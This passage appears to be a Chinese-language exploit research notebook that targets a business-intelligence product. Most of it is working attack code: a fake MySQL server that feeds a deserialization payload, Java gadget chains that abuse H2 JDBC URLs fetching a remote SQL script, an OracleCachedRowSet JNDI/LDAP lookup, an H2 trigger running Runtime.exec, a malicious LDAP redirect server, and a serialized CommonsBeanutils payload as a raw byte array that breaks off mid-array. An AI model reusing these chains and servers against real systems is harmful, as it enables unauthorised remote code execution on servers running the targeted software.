0012000000fd00001f00002b00001303646566000000157472616e73616374696f6e5f69736f6c6174696f6e000c21002d000000fd00001f000022000014036465660000000c776169745f74696d656f7574000c3f001500000008a000000000020100150131047574663804757466380475746638066c6174696e31116c6174696e315f737765646973685f6369000532383830300347504c013107343139343330340236300731303438353736034f4646894f4e4c595f46554c4c5f47524f55505f42592c5354524943545f5452414e535f5441424c45532c4e4f5f5a45524f5f494e5f444154452c4e4f5f5a45524f5f444154452c4552524f525f464f525f4449564953494f4e5f42595f5a45524f2c
4e4f5f4155544f5f4352454154455f555345522c4e4f5f454e47494e455f535542535449545554494f4e0cd6d0b9fab1ead7bccab1bce4062b30383a30300f52455045415441424c452d5245414405323838303007000016fe000002000000'
send_data(conn,_payload)
data=receive_data(conn)
elif "show warnings" in data:
_payload = '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'
send_data(conn, _payload)
data = receive_data(conn)
if "set names" in data:
send_data(conn, response_ok_data)
data = receive_data(conn)
if "set character_set_results" in data:
send_data(conn, response_ok_data)
data = receive_data(conn)
if "show session status" in data:
mysql_data = '0100000102'
mysql_data += '1a000002036465660001630163016301630c3f00ffff0000fc9000000000'
mysql_data += '1a000003036465660001630163016301630c3f00ffff0000fc9000000000'
# 为什么我加了EOF Packet 就无法正常运行呢??
# 获取payload
payload_content=get_payload_content()
# 计算payload长度
payload_length = str(hex(len(payload_content)//2)).replace('0x', '').zfill(4)
payload_length_hex = payload_length[2:4] + payload_length[0:2]
# 计算数据包长度
data_len = str(hex(len(payload_content)//2 + 4)).replace('0x', '').zfill(6)
data_len_hex = data_len[4:6] + data_len[2:4] + data_len[0:2]
mysql_data += data_len_hex + '04' + 'fbfc'+ payload_length_hex
mysql_data += str(payload_content)
mysql_data += '07000005fe000022000100'
send_data(conn, mysql_data)
data = receive_data(conn)
if "show warnings" in data:
payload = '01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f00006d000005044e6f74650431313035625175657279202753484f572053455353494f4e20535441545553272072657772697474656e20746f202773656c6563742069642c6f626a2066726f6d2063657368692e6f626a73272062792061207175657279207265777269746520706c7567696e07000006fe000002000000'
send_data(conn, payload)
break


if __name__ == '__main__':
HOST ='0.0.0.0'
PORT = 3306

sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#当socket关闭后,本地端用于该socket的端口号立刻就可以被重用.为了实验的时候不用等待很长时间
sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sk.bind((HOST, PORT))
sk.listen(1)

print("start fake mysql server listening on {}:{}".format(HOST,PORT))

run()

mysql组件反序列化依然不成功,说明的确是版本问题,,,

某软BI v5反序列化绕过

jdbc-h2(h2 rce利用失败,h2 1.4.192无rce漏洞)

参考h2的jdbc利用:
https://m0d9.me/2021/04/26/Jdbc%E7%A2%8E%E7%A2%8E%E5%BF%B5%E4%B8%89%EF%BC%9A%E5%86%85%E5%AD%98%E6%95%B0%E6%8D%AE%E5%BA%93/

package org.example;
import com.fr.json.revise.EncodeException;
import com.fr.third.alibaba.druid.pool.DruidAbstractDataSource;
import com.fr.third.alibaba.druid.pool.DruidDataSource;
import com.fr.third.alibaba.druid.pool.xa.DruidXADataSource;
import com.fasterxml.jackson.databind.node.POJONode;
import com.fr.third.fasterxml.jackson.databind.ObjectMapper;
import com.fr.third.fasterxml.jackson.databind.SerializationFeature;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xpath.internal.objects.XString;
import javassist.*;
import org.apache.commons.collections4.FunctorException;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;

import javax.swing.UIDefaults;

import javax.management.BadAttributeValueExpException;
import com.fr.json.JSONArray;

import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.Signature;
import java.security.SignedObject;
import java.util.*;

public class Main {

public static void main(String[] args) throws NotSerializableException, EncodeException, IllegalAccessException, NoSuchFieldException, NotFoundException, CannotCompileException, IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException {

//Test test = new Test();
//User user = new User(test, "qqq");
DruidXADataSource druidXADataSource = new DruidXADataSource();

List<?> list_3 = new ArrayList<>(Arrays.asList(druidXADataSource));
//JSONArray jsonArray_3 = new JSONArray(druidXADataSource);

//new ObjectMapper().disable(SerializationFeature.FAIL_ON_EMPTY_BEANS);

List<?> list_1 = new ArrayList<>(Arrays.asList(list_3));
List<?> list_2 = new ArrayList<>(Arrays.asList("1"));
JSONArray jsonArray_1 = new JSONArray(list_1);
JSONArray jsonArray_2 = new JSONArray(list_2);

UIDefaults uiDefaults = new UIDefaults();
Class clazz = Class.forName("javax.swing.UIDefaults$TextAndMnemonicHashMap");
Constructor<?> t_constructor = clazz.getDeclaredConstructor();
t_constructor.setAccessible(true);
Object textAndMnemonicHashMap_1 = t_constructor.newInstance();
Object textAndMnemonicHashMap_2 = t_constructor.newInstance();
Method putmethod = clazz.getSuperclass().getDeclaredMethod("put", Object.class, Object.class);
putmethod.setAccessible(true);
putmethod.invoke(textAndMnemonicHashMap_1, jsonArray_1, 11);
putmethod.invoke(textAndMnemonicHashMap_2, jsonArray_2, jsonArray_2);

//HashSet set = new LinkedHashSet();
//set.add(jsonArray_1);
//set.add(jsonArray_2);

//使用一个无害的InvokerTransformer
//InvokerTransformer transformer_1 = new InvokerTransformer("toString", null, null);
//TransformingComparator transformingComparator_1 = new TransformingComparator(transformer_1);

//TreeMap treeMap_1 = new TreeMap<>(transformingComparator_1);
//treeMap_1.put(textAndMnemonicHashMap_1, jsonArray_1);

//TreeMap treeMap_2 = new TreeMap<>(transformingComparator_1);
//treeMap_2.put(textAndMnemonicHashMap_1, jsonArray_2);

Field statLogger = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("statLogger");
statLogger.setAccessible(true);
statLogger.set(druidXADataSource, null);
Field transactionHistogram = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("transactionHistogram");
transactionHistogram.setAccessible(true);
transactionHistogram.set(druidXADataSource, null);
Field logWriter = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("logWriter");
logWriter.setAccessible(true);
logWriter.set(druidXADataSource, null);
Field initedLatch = DruidXADataSource.class.getSuperclass().getDeclaredField("initedLatch");
initedLatch.setAccessible(true);
initedLatch.set(druidXADataSource, null);
Field initialSize = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("initialSize");
initialSize.setAccessible(true);
initialSize.set(druidXADataSource, 1);


//Field driverClass = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("driverClass");
//driverClass.setAccessible(true);
//driverClass.set(druidXADataSource, "javax.naming.InitialContext");

Field xaconnection = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("jdbcUrl");
xaconnection.setAccessible(true);
//nc.exe -lvvp 6666 查看System.getProperty方法调取对应的value
//xaconnection.set(druidXADataSource, "jdbc:hsqldb:http://127.0.0.1:6666/?${user.dir}");
xaconnection.set(druidXADataSource, "jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8888/sql.sql'");



Hashtable<Object,Object> hashtable = new Hashtable<>();
hashtable.put(textAndMnemonicHashMap_1,1);
hashtable.put(textAndMnemonicHashMap_2,1);

putmethod.invoke(textAndMnemonicHashMap_1, jsonArray_1, jsonArray_1);


//List<String> list_3 = new ArrayList<>(Arrays.asList("aaa"));
//Field list = JSONArray.class.getDeclaredField("list");
//list.setAccessible(true);
//list.set(jsonArray_1, list_3);

//List<String> list_3 = new ArrayList<>(Arrays.asList("uuuuuu"));
//jsonArray_2.remove(list_1);
//jsonArray_2.add(list_3);
//list_1.add("uuuu");

ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(byteArrayOutputStream);
oos.writeObject(hashtable);

byte[] bytes = byteArrayOutputStream.toByteArray();
// 将输出流转化成字节数组,然后base64加密,通过python解密传入,触发反序列化,
Base64.Encoder encoder = Base64.getEncoder();
String base64 = encoder.encodeToString(bytes);
System.out.println(base64);

ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(byteArrayOutputStream.toByteArray()));
Object o = (Object) ois.readObject();

}
}
搭建1.4.192后发现是版本问题,此版本不能rce,将版本换成1.4.197后能rce
pom.xml
<dependency>
<groupId>com.h2database</groupId>
<artifactId>h2</artifactId>
<version>1.4.192</version>
</dependency>

Main.java:
package org.example;

import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.Signature;
import java.security.SignedObject;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;
import java.util.*;

public class Main {

public static void main(String[] args) throws NotSerializableException, IllegalAccessException, NoSuchFieldException, IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException {

String DRIVER_CLASS = "org.h2.Driver";
String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8888/sql.sql'";

Properties info = null;
try {
Class.forName(DRIVER_CLASS);
DriverManager.getDriver(JDBC_URL).connect(JDBC_URL, info);
}catch (ClassNotFoundException | SQLException e) {
e.printStackTrace();
}

}
}


sql.sql的内容:
CREATE TRIGGER poc2 BEFORE SELECT ON
INFORMATION_SCHEMA.TABLES AS $$//javascript
java.lang.Runtime.getRuntime().exec("calc") $$;


或者直接在JDBC_URL上构造js语句:
String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ONn" +
"INFORMATION_SCHEMA.TABLES AS $$//javascriptn" +
"java.lang.Runtime.getRuntime().exec('cmd /c calc.exe')n" +
"$$n";

jndi 反序列化 rce(成功)

生成base64加密的序列化数据,准备利用python发包,

package org.example;
import com.fr.json.revise.EncodeException;
import com.fr.serialization.JDKSerializer;
import com.fr.third.alibaba.druid.pool.DruidAbstractDataSource;
import com.fr.third.alibaba.druid.pool.DruidDataSource;
import com.fr.third.alibaba.druid.pool.xa.DruidXADataSource;
import com.fasterxml.jackson.databind.node.POJONode;
import com.fr.third.fasterxml.jackson.databind.ObjectMapper;
import com.fr.third.fasterxml.jackson.databind.SerializationFeature;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xpath.internal.objects.XString;
import javassist.*;
import oracle.jdbc.rowset.OracleCachedRowSet;
import org.apache.arrow.vector.util.JsonStringArrayList;
import org.apache.commons.collections4.FunctorException;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;

import javax.swing.UIDefaults;

import javax.management.BadAttributeValueExpException;
import com.fr.json.JSONArray;

import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.Signature;
import java.security.SignedObject;
import java.sql.SQLException;
import java.util.*;
import java.util.zip.GZIPInputStream;
import java.util.zip.GZIPOutputStream;

public class Main {

public static void main(String[] args) throws NotSerializableException, EncodeException, IllegalAccessException, NoSuchFieldException, NotFoundException, CannotCompileException, IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, SQLException {

OracleCachedRowSet oracleCachedRowSet_1 = new OracleCachedRowSet();
Field dataSourceName_1 = OracleCachedRowSet.class.getSuperclass().getDeclaredField("dataSourceName");
dataSourceName_1.setAccessible(true);
dataSourceName_1.set(oracleCachedRowSet_1, "ldap://127.0.0.1:4444/dc=example,dc=com");

OracleCachedRowSet oracleCachedRowSet_2 = new OracleCachedRowSet();
Field dataSourceName_2 = OracleCachedRowSet.class.getSuperclass().getDeclaredField("dataSourceName");
dataSourceName_2.setAccessible(true);
dataSourceName_2.set(oracleCachedRowSet_2, "ldap://127.0.0.1:4444/dc=example,dc=com");



JsonStringArrayList jsonStringArrayList_1= new JsonStringArrayList(2);
jsonStringArrayList_1.add(oracleCachedRowSet_1);

JsonStringArrayList jsonStringArrayList_2= new JsonStringArrayList(2);
jsonStringArrayList_2.add(oracleCachedRowSet_2);

UIDefaults uiDefaults = new UIDefaults();
Class clazz = Class.forName("javax.swing.UIDefaults$TextAndMnemonicHashMap");
Constructor<?> t_constructor = clazz.getDeclaredConstructor();
t_constructor.setAccessible(true);
Object textAndMnemonicHashMap_1 = t_constructor.newInstance();
Object textAndMnemonicHashMap_2 = t_constructor.newInstance();
Method putmethod = clazz.getSuperclass().getDeclaredMethod("put", Object.class, Object.class);
putmethod.setAccessible(true);
putmethod.invoke(textAndMnemonicHashMap_1, jsonStringArrayList_1, 1);
putmethod.invoke(textAndMnemonicHashMap_2, jsonStringArrayList_2, jsonStringArrayList_2);

Vector v_1 = new Vector();
v_1.add(0, "111");
v_1.add(1, "111");

Vector v_2 = new Vector();
v_2.add(0, "222");
v_2.add(1, "222");

String[] strings = new String[1];
strings[0] = "111";
Field metaData = OracleCachedRowSet.class.getDeclaredField("metaData");
metaData.setAccessible(true);
metaData.set(oracleCachedRowSet_1, strings);
metaData.set(oracleCachedRowSet_2, strings);

Field matchColumnNames = OracleCachedRowSet.class.getSuperclass().getDeclaredField("matchColumnNames");
matchColumnNames.setAccessible(true);
matchColumnNames.set(oracleCachedRowSet_1, v_1);
matchColumnNames.set(oracleCachedRowSet_2, v_1);

Field matchColumnIndexes = OracleCachedRowSet.class.getSuperclass().getDeclaredField("matchColumnIndexes");
matchColumnIndexes.setAccessible(true);
matchColumnIndexes.set(oracleCachedRowSet_1, v_2);
matchColumnIndexes.set(oracleCachedRowSet_2, v_2);


Field monitorLock = OracleCachedRowSet.class.getSuperclass().getDeclaredField("monitorLock");
monitorLock.setAccessible(true);
monitorLock.set(oracleCachedRowSet_1, null);
monitorLock.set(oracleCachedRowSet_2, null);

Hashtable<Object,Object> hashtable = new Hashtable<>();
hashtable.put(textAndMnemonicHashMap_1,1);
hashtable.put(textAndMnemonicHashMap_2,1);

putmethod.invoke(textAndMnemonicHashMap_1, jsonStringArrayList_1, jsonStringArrayList_1);

//putmethod.invoke(textAndMnemonicHashMap_1, jsonStringArrayList_1, jsonStringArrayList_1);


//List<String> list_3 = new ArrayList<>(Arrays.asList("aaa"));
//Field list = JSONArray.class.getDeclaredField("list");
//list.setAccessible(true);
//list.set(jsonArray_1, list_3);

//List<String> list_3 = new ArrayList<>(Arrays.asList("uuuuuu"));
//jsonArray_2.remove(list_1);
//jsonArray_2.add(list_3);
//list_1.add("uuuu");

ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(byteArrayOutputStream);
oos.writeObject(hashtable);

byte[] bytes = byteArrayOutputStream.toByteArray();



// 构造一个GZIP格式的字节数组,将恶意字节数组存储在GZIP数据块中
ByteArrayOutputStream baos = new ByteArrayOutputStream();
GZIPOutputStream gzipOutputStream = new GZIPOutputStream(baos);
gzipOutputStream.write(bytes);
gzipOutputStream.finish();

// 将输出流转化成字节数组,然后base64加密,通过python解密传入,触发反序列化,
byte[] gzipBytes = baos.toByteArray();
Base64.Encoder encoder = Base64.getEncoder();
String base64 = encoder.encodeToString(gzipBytes);
System.out.println(base64);

// 将GZIP格式的字节数组封装成一个输入流对象,并作为var0参数传入Env函数中
InputStream var0 = new ByteArrayInputStream(gzipBytes);

GZIPInputStream var2 = new GZIPInputStream(var0);
JDKSerializer.CustomObjectInputStream var3 = new JDKSerializer.CustomObjectInputStream(var2);
//Map map = (Map) var3.readObject();
}
}

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

jndi服务端
bytes为cb链的字节数组,

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>

<groupId>org.example</groupId>
<artifactId>jndi</artifactId>
<version>1.0-SNAPSHOT</version>

<properties>
<maven.compiler.source>8</maven.compiler.source>
<maven.compiler.target>8</maven.compiler.target>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
</properties>
<dependencies>
<dependency>
<groupId>com.unboundid</groupId>
<artifactId>unboundid-ldapsdk</artifactId>
<version>6.0.5</version> <!-- 请使用最新的稳定版本 -->
</dependency>

</dependencies>

</project>




package org.example;

import com.unboundid.ldap.listener.InMemoryDirectoryServer;
import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
import com.unboundid.ldap.listener.InMemoryListenerConfig;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPResult;
import com.unboundid.ldap.sdk.ResultCode;


import javax.management.BadAttributeValueExpException;
import javax.net.ServerSocketFactory;
import javax.net.SocketFactory;
import javax.net.ssl.SSLSocketFactory;
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.InetAddress;
import java.net.URL;
import java.util.HashMap;
import java.util.Map;

public class Main {
private static final String LDAP_BASE = "dc=example,dc=com";

public static void main ( String[] tmp_args ) throws Exception{
String[] args=new String[]{"http://127.0.0.1:8081/#test"};
int port = 4444;

InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE);
config.setListenerConfigs(new InMemoryListenerConfig(
"listen", //$NON-NLS-1$
InetAddress.getByName("0.0.0.0"), //$NON-NLS-1$
port,
ServerSocketFactory.getDefault(),
SocketFactory.getDefault(),
(SSLSocketFactory) SSLSocketFactory.getDefault()));

config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(args[ 0 ])));
InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);
System.out.println("Listening on 0.0.0.0:" + port); //$NON-NLS-1$
ds.startListening();
}

private static class OperationInterceptor extends InMemoryOperationInterceptor {

private URL codebase;

public OperationInterceptor ( URL cb ) {
this.codebase = cb;
}

@Override
public void processSearchResult ( InMemoryInterceptedSearchResult result ) {
String base = result.getRequest().getBaseDN();
Entry e = new Entry(base);
try {
sendResult(result, base, e);
}
catch ( Exception e1 ) {
e1.printStackTrace();
}
}

protected void sendResult ( InMemoryInterceptedSearchResult result, String base, Entry e ) throws Exception {
URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class"));
System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl);
e.addAttribute("javaClassName", "foo");
String cbstring = this.codebase.toString();
int refPos = cbstring.indexOf('#');
if ( refPos > 0 ) {
cbstring = cbstring.substring(0, refPos);
}
byte[] bytes = new byte[]{-84, -19, 0, 5, 115, 114, 0, 23, 106, 97, 118, 97, 46, 117, 116, 105, 108, 46, 80, 114, 105, 111, 114, 105, 116, 121, 81, 117, 101, 117, 101, -108, -38, 48, -76, -5, 63, -126, -79, 3, 0, 2, 73, 0, 4, 115, 105, 122, 101, 76, 0, 10, 99, 111, 109, 112, 97, 114, 97, 116, 111, 114, 116, 0, 22, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 67, 111, 109, 112, 97, 114, 97, 116, 111, 114, 59, 120, 112, 0, 0, 0, 2, 115, 114, 0, 43, 111, 114, 103, 46, 97, 112, 97, 99, 104, 101, 46, 99, 111, 109, 109, 111, 110, 115, 46, 98, 101, 97, 110, 117, 116, 105, 108, 115, 46, 66, 101, 97, 110, 67, 111, 109, 112, 97, 114, 97, 116, 111, 114, -29, -95, -120, -22, 115, 34, -92, 72, 2, 0, 2, 76, 0, 10, 99, 111, 109, 112, 97, 114, 97, 116, 111, 114, 113, 0, 126, 0, 1, 76, 0, 8, 112, 114, 111, 112, 101, 114, 116, 121, 116, 0, 18, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 120, 112, 115, 114, 0, 42, 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 83, 116, 114, 105, 110, 103, 36, 67, 97, 115, 101, 73, 110, 115, 101, 110, 115, 105, 116, 105, 118, 101, 67, 111, 109, 112, 97, 114, 97, 116, 111, 114, 119, 3, 92, 125, 92, 80, -27, -50, 2, 0, 0, 120, 112, 116, 0, 16, 111, 117, 116, 112, 117, 116, 80, 114, 111, 112, 101, 114, 116, 105, 101, 115, 119, 4, 0, 0, 0, 3, 115, 114, 0, 58, 99, 111, 109, 46, 115, 117, 110, 46, 111, 114, 103, 46, 97, 112, 97, 99, 104, 101, 46, 120, 97, 108, 97, 110, 46, 105, 110, 116, 101, 114, 110, 97, 108, 46, 120, 115, 108, 116, 99, 46, 116, 114, 97, 120, 46, 84, 101, 109, 112, 108, 97, 116, 101, 115, 73, 109, 112, 108, 9, 87, 79, -63, 110, -84, -85, 51, 3, 0, 6, 73, 0, 13, 95, 105, 110, 100, 101, 110, 116, 78, 117, 109, 98, 101, 114, 73, 0, 14, 95, 116, 114, 97, 110, 115, 108, 101, 116, 73, 110, 100, 101, 120, 91, 0, 10, 95, 98, 121, 116, 101, 99, 111, 100, 101, 115, 116, 0, 3, 91, 91, 66, 91, 0, 6, 95, 99, 108, 97, 115, 115, 116, 0, 18, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 67, 108, 97, 115, 
115, 59, 76, 0, 5, 95, 110, 97, 109, 101, 113, 0, 126, 0, 4, 76, 0, 17, 95, 111, 117, 116, 112, 117, 116, 80, 114, 111, 112, 101, 114, 116, 105, 101, 115, 116, 0, 22, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 80, 114, 111, 112, 101, 114, 116, 105, 101, 115, 59, 120, 112, 0, 0, 0, 0, -1, -1, -1, -1, 117, 114, 0, 3, 91, 91, 66, 75, -3, 25, 21, 103, 103, -37, 55, 2, 0, 0, 120, 112, 0, 0, 0, 1, 117, 114, 0, 2, 91, 66, -84, -13, 23, -8, 6, 8, 84, -32, 2, 0, 0, 120, 112, 0, 0, 5, -24, -54, -2, -70, -66, 0, 0, 0, 51, 0, 52, 10, 0, 8, 0, 36, 10, 0, 37, 0, 38, 8, 0, 39, 10, 0, 37, 0, 40, 7, 0, 41, 10, 0, 5, 0, 42, 7, 0, 43, 7, 0, 44, 1, 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 3, 40, 41, 86, 1, 0, 4, 67, 111, 100, 101, 1, 0, 15, 76, 105, 110, 101, 78, 117, 109, 98, 101, 114, 84, 97, 98, 108, 101, 1, 0, 18, 76, 111, 99, 97, 108, 86, 97, 114, 105, 97, 98, 108, 101, 84, 97, 98, 108, 101, 1, 0, 4, 116, 104, 105, 115, 1, 0, 18, 76, 111, 114, 103, 47, 101, 120, 97, 109, 112, 108, 101, 47, 67, 97, 108, 99, 59, 1, 0, 9, 116, 114, 97, 110, 115, 102, 111, 114, 109, 1, 0, 114, 40, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 68, 79, 77, 59, 91, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 41, 86, 1, 0, 8, 100, 111, 99, 117, 109, 101, 110, 116, 1, 0, 45, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 68, 79, 77, 59, 1, 0, 8, 104, 97, 110, 100, 108, 101, 114, 115, 1, 0, 66, 91, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 
112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 1, 0, 10, 69, 120, 99, 101, 112, 116, 105, 111, 110, 115, 7, 0, 45, 1, 0, -90, 40, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 68, 79, 77, 59, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 100, 116, 109, 47, 68, 84, 77, 65, 120, 105, 115, 73, 116, 101, 114, 97, 116, 111, 114, 59, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 41, 86, 1, 0, 8, 105, 116, 101, 114, 97, 116, 111, 114, 1, 0, 53, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 100, 116, 109, 47, 68, 84, 77, 65, 120, 105, 115, 73, 116, 101, 114, 97, 116, 111, 114, 59, 1, 0, 7, 104, 97, 110, 100, 108, 101, 114, 1, 0, 65, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 1, 0, 8, 60, 99, 108, 105, 110, 105, 116, 62, 1, 0, 1, 101, 1, 0, 21, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 79, 69, 120, 99, 101, 112, 116, 105, 111, 110, 59, 1, 0, 13, 83, 116, 97, 99, 107, 77, 97, 112, 84, 97, 98, 108, 101, 7, 0, 41, 1, 0, 10, 
83, 111, 117, 114, 99, 101, 70, 105, 108, 101, 1, 0, 9, 67, 97, 108, 99, 46, 106, 97, 118, 97, 12, 0, 9, 0, 10, 7, 0, 46, 12, 0, 47, 0, 48, 1, 0, 4, 99, 97, 108, 99, 12, 0, 49, 0, 50, 1, 0, 19, 106, 97, 118, 97, 47, 105, 111, 47, 73, 79, 69, 120, 99, 101, 112, 116, 105, 111, 110, 12, 0, 51, 0, 10, 1, 0, 16, 111, 114, 103, 47, 101, 120, 97, 109, 112, 108, 101, 47, 67, 97, 108, 99, 1, 0, 64, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 114, 117, 110, 116, 105, 109, 101, 47, 65, 98, 115, 116, 114, 97, 99, 116, 84, 114, 97, 110, 115, 108, 101, 116, 1, 0, 57, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 84, 114, 97, 110, 115, 108, 101, 116, 69, 120, 99, 101, 112, 116, 105, 111, 110, 1, 0, 17, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 1, 0, 10, 103, 101, 116, 82, 117, 110, 116, 105, 109, 101, 1, 0, 21, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 59, 1, 0, 4, 101, 120, 101, 99, 1, 0, 39, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 59, 1, 0, 15, 112, 114, 105, 110, 116, 83, 116, 97, 99, 107, 84, 114, 97, 99, 101, 0, 33, 0, 7, 0, 8, 0, 0, 0, 0, 0, 4, 0, 1, 0, 9, 0, 10, 0, 1, 0, 11, 0, 0, 0, 47, 0, 1, 0, 1, 0, 0, 0, 5, 42, -73, 0, 1, -79, 0, 0, 0, 2, 0, 12, 0, 0, 0, 6, 0, 1, 